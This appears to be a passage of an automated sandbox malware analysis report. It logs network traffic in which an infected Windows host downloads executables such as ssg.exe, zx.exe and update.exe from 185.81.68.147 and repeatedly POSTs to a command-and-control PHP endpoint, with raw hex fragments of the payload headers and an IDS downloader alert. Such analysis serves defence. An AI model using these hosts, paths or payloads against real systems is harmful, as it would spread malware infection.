              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 17:15:01 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 17:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 08:15:56 GMTETag: "5a4530-6294aac656b58"Accept-Ranges: bytesContent-Length: 5915952Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 90 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 c5 45 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 17:15:15 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 16 Dec 2024 19:28:25 GMTETag: "4c400-629682f2e4e8d"Accept-Ranges: bytesContent-Length: 312320Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4f 7f 60 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 0c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 72 00 00 28 00 00 00 00 a0 00 00 28 03 00 00 00 90 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0b 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 23 00 00 00 50 00 00 00 24 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 4c 02 00 00 00 90 00 00 00 04 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 a0 00 00 00 04 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 b0 00 00 00 5a 04 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
              Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49708 -> 185.81.68.147:80
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49709 -> 185.81.68.147:80
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 37
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
